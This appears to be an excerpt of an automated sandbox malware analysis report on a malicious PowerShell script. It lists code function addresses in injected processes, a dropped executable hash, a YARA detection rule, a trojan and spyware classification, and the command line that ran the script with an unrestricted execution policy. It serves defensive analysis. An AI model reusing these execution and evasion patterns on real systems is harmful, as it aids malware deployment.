Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_03232000	6_2_03232000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031C4750	6_2_031C4750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031A0770	6_2_031A0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0319C7C0	6_2_0319C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031BC6E0	6_2_031BC6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031A0535	6_2_031A0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_03260591	6_2_03260591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_03244420	6_2_03244420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_03252446	6_2_03252446
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0324E4F6	6_2_0324E4F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0325AB40	6_2_0325AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_03256BD7	6_2_03256BD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0319EA80	6_2_0319EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031B6962	6_2_031B6962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0326A9A6	6_2_0326A9A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031A29A0	6_2_031A29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031A2840	6_2_031A2840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031AA840	6_2_031AA840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031868B8	6_2_031868B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031CE8F0	6_2_031CE8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_03242F30	6_2_03242F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031C0F30	6_2_031C0F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031E2F28	6_2_031E2F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_03214F40	6_2_03214F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0321EFA0	6_2_0321EFA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031ACFE0	6_2_031ACFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0325EE26	6_2_0325EE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031A0E59	6_2_031A0E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031B2E90	6_2_031B2E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0325CE93	6_2_0325CE93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0325EEDB	6_2_0325EEDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031AAD00	6_2_031AAD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0323CD1F	6_2_0323CD1F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031B8DBF	6_2_031B8DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0319ADE0	6_2_0319ADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031A0C00	6_2_031A0C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_03240CB5	6_2_03240CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_03190CF2	6_2_03190CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0325132D	6_2_0325132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0318D34C	6_2_0318D34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031E739A	6_2_031E739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031A52A0	6_2_031A52A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_032412ED	6_2_032412ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031BB2C0	6_2_031BB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0326B16B	6_2_0326B16B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0318F172	6_2_0318F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031D516C	6_2_031D516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031AB1B0	6_2_031AB1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0325F0E0	6_2_0325F0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_032570E9	6_2_032570E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031A70C0	6_2_031A70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0324F0CC	6_2_0324F0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0325F7B0	6_2_0325F7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031E5630	6_2_031E5630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_032516CC	6_2_032516CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_03257571	6_2_03257571
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0323D5B0	6_2_0323D5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_032695C3	6_2_032695C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0325F43F	6_2_0325F43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_03191460	6_2_03191460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0325FB76	6_2_0325FB76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031BFB80	6_2_031BFB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_03215BF0	6_2_03215BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031DDBF9	6_2_031DDBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_03213A6C	6_2_03213A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_03257A46	6_2_03257A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0325FA49	6_2_0325FA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_03241AA3	6_2_03241AA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0323DAAC	6_2_0323DAAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031E5AA0	6_2_031E5AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0324DAC6	6_2_0324DAC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_03235910	6_2_03235910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031A9950	6_2_031A9950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031BB950	6_2_031BB950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0320D800	6_2_0320D800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031A38E0	6_2_031A38E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0325FF09	6_2_0325FF09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031A1F92	6_2_031A1F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0325FFB1	6_2_0325FFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_03163FD5	6_2_03163FD5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_03163FD2	6_2_03163FD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031A9EB0	6_2_031A9EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_03257D73	6_2_03257D73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031A3D40	6_2_031A3D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_03251D5A	6_2_03251D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031BFDC0	6_2_031BFDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_03219C32	6_2_03219C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0325FCF2	6_2_0325FCF2
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	Code function: 14_2_02FA9A69	14_2_02FA9A69
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	Code function: 14_2_02FB22E2	14_2_02FB22E2
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	Code function: 14_2_02FB22E7	14_2_02FB22E7
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	Code function: 14_2_02FABAD7	14_2_02FABAD7
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	Code function: 14_2_02FA9AC7	14_2_02FA9AC7
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	Code function: 14_2_02FB40D6	14_2_02FB40D6
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	Code function: 14_2_02FCA8B7	14_2_02FCA8B7
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	Code function: 14_2_02FAB8B7	14_2_02FAB8B7
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	Code function: 14_2_02FAB8AE	14_2_02FAB8AE
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	Code function: 14_2_02FA9C60	14_2_02FA9C60
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	Code function: 14_2_02FA9C17	14_2_02FA9C17
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	Code function: 14_2_02FA9C0B	14_2_02FA9C0B
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_05270535	15_2_05270535
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_05330591	15_2_05330591
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_05314420	15_2_05314420
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_05322446	15_2_05322446
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_0531E4F6	15_2_0531E4F6
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_05270770	15_2_05270770
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_05294750	15_2_05294750
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_0526C7C0	15_2_0526C7C0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_0528C6E0	15_2_0528C6E0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_05260100	15_2_05260100
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_0530A118	15_2_0530A118
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_052F8158	15_2_052F8158
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_053241A2	15_2_053241A2
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_053301AA	15_2_053301AA
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_053281CC	15_2_053281CC
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_05302000	15_2_05302000
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_0532A352	15_2_0532A352
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_053303E6	15_2_053303E6
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_0527E3F0	15_2_0527E3F0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_05310274	15_2_05310274
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_052F02C0	15_2_052F02C0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_0527AD00	15_2_0527AD00
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_0530CD1F	15_2_0530CD1F
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_05288DBF	15_2_05288DBF
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_0526ADE0	15_2_0526ADE0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_05270C00	15_2_05270C00
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_05310CB5	15_2_05310CB5
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_05260CF2	15_2_05260CF2
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_05312F30	15_2_05312F30
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_052B2F28	15_2_052B2F28
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_05290F30	15_2_05290F30
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_052E4F40	15_2_052E4F40
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_052EEFA0	15_2_052EEFA0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_0527CFE0	15_2_0527CFE0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_05262FC8	15_2_05262FC8
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_0532EE26	15_2_0532EE26
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_05270E59	15_2_05270E59
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_0532CE93	15_2_0532CE93
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_05282E90	15_2_05282E90
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_0532EEDB	15_2_0532EEDB
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_05286962	15_2_05286962
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_052729A0	15_2_052729A0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_0533A9A6	15_2_0533A9A6
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_05272840	15_2_05272840
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_0527A840	15_2_0527A840
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_052568B8	15_2_052568B8
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_0529E8F0	15_2_0529E8F0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_0532AB40	15_2_0532AB40
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_05326BD7	15_2_05326BD7
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_0526EA80	15_2_0526EA80
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_05327571	15_2_05327571
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_0530D5B0	15_2_0530D5B0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_053395C3	15_2_053395C3
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_0532F43F	15_2_0532F43F
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_05261460	15_2_05261460
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_0532F7B0	15_2_0532F7B0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_052B5630	15_2_052B5630
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_053216CC	15_2_053216CC
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_052A516C	15_2_052A516C
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_0525F172	15_2_0525F172
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_0533B16B	15_2_0533B16B
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_0527B1B0	15_2_0527B1B0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_0532F0E0	15_2_0532F0E0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_053270E9	15_2_053270E9
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_052770C0	15_2_052770C0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_0531F0CC	15_2_0531F0CC
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_0532132D	15_2_0532132D
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_0525D34C	15_2_0525D34C
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_052B739A	15_2_052B739A
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_052752A0	15_2_052752A0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_053112ED	15_2_053112ED
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_0528B2C0	15_2_0528B2C0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_05327D73	15_2_05327D73
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_05273D40	15_2_05273D40
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_05321D5A	15_2_05321D5A
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_0528FDC0	15_2_0528FDC0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_052E9C32	15_2_052E9C32
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_0532FCF2	15_2_0532FCF2
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_0532FF09	15_2_0532FF09
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_0532FFB1	15_2_0532FFB1
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_05271F92	15_2_05271F92
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_05233FD2	15_2_05233FD2
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_05233FD5	15_2_05233FD5
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_05279EB0	15_2_05279EB0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_05305910	15_2_05305910
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_05279950	15_2_05279950
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_0528B950	15_2_0528B950
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_052DD800	15_2_052DD800
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_052738E0	15_2_052738E0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_0532FB76	15_2_0532FB76
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_0528FB80	15_2_0528FB80
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_052ADBF9	15_2_052ADBF9
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_052E5BF0	15_2_052E5BF0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_052E3A6C	15_2_052E3A6C
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_05327A46	15_2_05327A46
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_0532FA49	15_2_0532FA49
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_052B5AA0	15_2_052B5AA0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_05311AA3	15_2_05311AA3
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_0530DAAC	15_2_0530DAAC
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_0531DAC6	15_2_0531DAC6
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_03211FD0	15_2_03211FD0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_0320CE47	15_2_0320CE47
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_0320CE50	15_2_0320CE50
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_0320B1A4	15_2_0320B1A4
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_0320B1B0	15_2_0320B1B0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_0320B1F9	15_2_0320B1F9
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_0320B060	15_2_0320B060
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_0320D070	15_2_0320D070
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_03215670	15_2_03215670
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_0321387B	15_2_0321387B
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_03213880	15_2_03213880
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_0322BE50	15_2_0322BE50
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_04FDE467	15_2_04FDE467
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_04FDE7FC	15_2_04FDE7FC
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_04FDD8C8	15_2_04FDD8C8
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	Code function: 16_2_02D69203	16_2_02D69203
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	Code function: 16_2_02D88203	16_2_02D88203
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	Code function: 16_2_02D71A23	16_2_02D71A23
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	Code function: 16_2_02D6E383	16_2_02D6E383
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	Code function: 16_2_02D691FA	16_2_02D691FA
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	Code function: 16_2_02D67413	16_2_02D67413
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	Code function: 16_2_02D6FC33	16_2_02D6FC33
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	Code function: 16_2_02D69423	16_2_02D69423
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	Code function: 16_2_02D6FC2E	16_2_02D6FC2E
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	Code function: 16_2_02D675AC	16_2_02D675AC
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	Code function: 16_2_02D67557	16_2_02D67557
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	Code function: 16_2_02D67563	16_2_02D67563

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\x.exe F2A70161F72F69FEF1F7D96C7773A5B670B26BF16BC62D4E42F4416F335AF8D6

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0320EA12 appears 86 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 031E7E54 appears 111 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0318B970 appears 277 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 031D5130 appears 58 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0321F290 appears 105 times
Source: C:\Windows\SysWOW64\runonce.exe	Code function: String function: 052DEA12 appears 86 times
Source: C:\Windows\SysWOW64\runonce.exe	Code function: String function: 052B7E54 appears 111 times
Source: C:\Windows\SysWOW64\runonce.exe	Code function: String function: 0525B970 appears 277 times
Source: C:\Windows\SysWOW64\runonce.exe	Code function: String function: 052A5130 appears 58 times
Source: C:\Windows\SysWOW64\runonce.exe	Code function: String function: 052EF290 appears 105 times

Source: Process Memory Space: powershell.exe PID: 6752, type: MEMORYSTR

Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: x.exe.0.dr

Static PE information: Section: qC?Cd22O ZLIB complexity 1.0003320970117846

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winPS1@13/8@16/12

Source: C:\Users\user\AppData\Local\Temp\x.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\x.exe.log

Source: C:\Users\user\AppData\Local\Temp\x.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2436:120:WilError_03

Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\laser (2).ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\notepad.exe "C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\laser (2).ps1"
